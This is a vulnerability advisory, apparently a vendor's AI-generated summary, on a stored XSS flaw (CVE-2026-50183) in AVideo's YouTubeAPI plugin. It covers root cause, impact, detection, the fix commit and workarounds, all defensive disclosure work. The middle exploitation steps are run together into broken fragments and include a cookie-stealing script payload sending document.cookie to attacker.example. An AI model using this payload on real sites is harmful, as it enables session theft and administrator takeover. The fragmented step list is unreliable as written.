
PEACH
Un cadre d’isolation des locataires
CVE-2026-50183 is a stored Cross-Site Scripting (XSS) vulnerability in the AVideo YouTubeAPI plugin (WWBN/AVideo) that allows any YouTube video uploader to inject malicious JavaScript into the AVideo homepage gallery by setting a hostile video title. The vulnerability affects AVideo versions ≤ 29.0 and was published on May 28, 2026, with the GitHub Advisory Database entry updated on June 4, 2026. It carries a CVSS v3.1 base score of 4.7 (Moderate) (GitHub Advisory).
The root cause is CWE-79 (Stored XSS) chained with CWE-829 (Inclusion of Functionality from Untrusted Control Sphere): plugin/YouTubeAPI/YouTubeAPI.php::listVideos() fetches the snippet.title field from the YouTube Data API and stores it in a YPTvideoObject without sanitization, treating uploader-controlled content as trusted. plugin/YouTubeAPI/gallerySection.php then reflects the title into four HTML contexts in each gallery card — three with no encoding whatsoever, and one with only a partial str_replace('"', '', $youtubeTitle) mitigation that strips double quotes from a single attribute but leaves the other three sinks unprotected. The most dangerous sink (line 60) renders the title directly into the DOM as a live <script> element, causing synchronous JavaScript execution. AVideo's response caching (default cacheTimeout of 3600 seconds) means the malicious payload persists even after the hostile video title is changed or removed on YouTube (GitHub Advisory, AVideo Security Advisory).
Every visitor who loads any AVideo page rendering the YouTubeAPI gallery section is affected: the injected JavaScript executes in the visitor's browser session under the AVideo origin, enabling theft of non-HttpOnly cookies and issuance of authenticated requests on behalf of the victim. When the victim is an AVideo administrator, the payload can perform any admin action available via cookie-based authentication — including creating users, escalating privileges, modifying configuration, or installing plugins — effectively enabling full administrative takeover of the AVideo instance. The payload's persistence through the cache window (up to one hour by default) means it continues to affect users even after the malicious YouTube video is removed (GitHub Advisory).
showGallerySection=true (both are defaults after a YouTube Data API key is configured). Enumerate the operator's configured keyword/search query by observing the gallery content on the AVideo homepage.<script>document.location='https://attacker.example/steal?c='+document.cookie</script>.cacheTimeout) for AVideo's cached YouTube response to expire and a fresh listVideos() call to fetch the malicious title.<script> element and executes synchronously in the victim's browser.listVideos() calls) coinciding with introduction of a new video with anomalous title characters (<, >, script).cacheTimeout seconds) containing raw HTML/JavaScript in the snippet.title field of cached YouTube API responses (AVideo Security Advisory).The fix was committed to the WWBN/AVideo repository (commit 7292129) and applies htmlspecialchars($video->title, ENT_QUOTES | ENT_HTML5, 'UTF-8') and equivalent encoding to the thumbnail URL before rendering in gallerySection.php, neutralizing all four injection sinks. As of the advisory publication, no patched release version was formally tagged (affected versions listed as ≤ 29.0 with "Patched versions: None" in the advisory), so operators should update to the latest master branch commit or apply the patch manually. As an interim workaround, disable the YouTubeAPI plugin or set showGallerySection=false in the plugin configuration, and manually flush the AVideo YouTube response cache to remove any already-cached malicious titles (AVideo Patch Commit, GitHub Advisory).
The vulnerability was reported by security researcher arkmarta and published by AVideo maintainer DanielnetoDotCom via GitHub's coordinated disclosure process on May 28, 2026. No significant broader media coverage or notable social media commentary beyond the GitHub advisory and GitLab advisory mirror has been identified (GitHub Advisory).
Source: Ce rapport a été généré à l’aide de l’IA
Évaluation gratuite des vulnérabilités
Évaluez vos pratiques de sécurité cloud dans 9 domaines de sécurité pour évaluer votre niveau de risque et identifier les failles dans vos défenses.
Obtenez une démo personnalisée
"La meilleure expérience utilisateur que j’ai jamais vue, offre une visibilité totale sur les workloads cloud."
"Wiz fournit une interface unique pour voir ce qui se passe dans nos environnements cloud."
"Nous savons que si Wiz identifie quelque chose comme critique, c’est qu’il l’est réellement."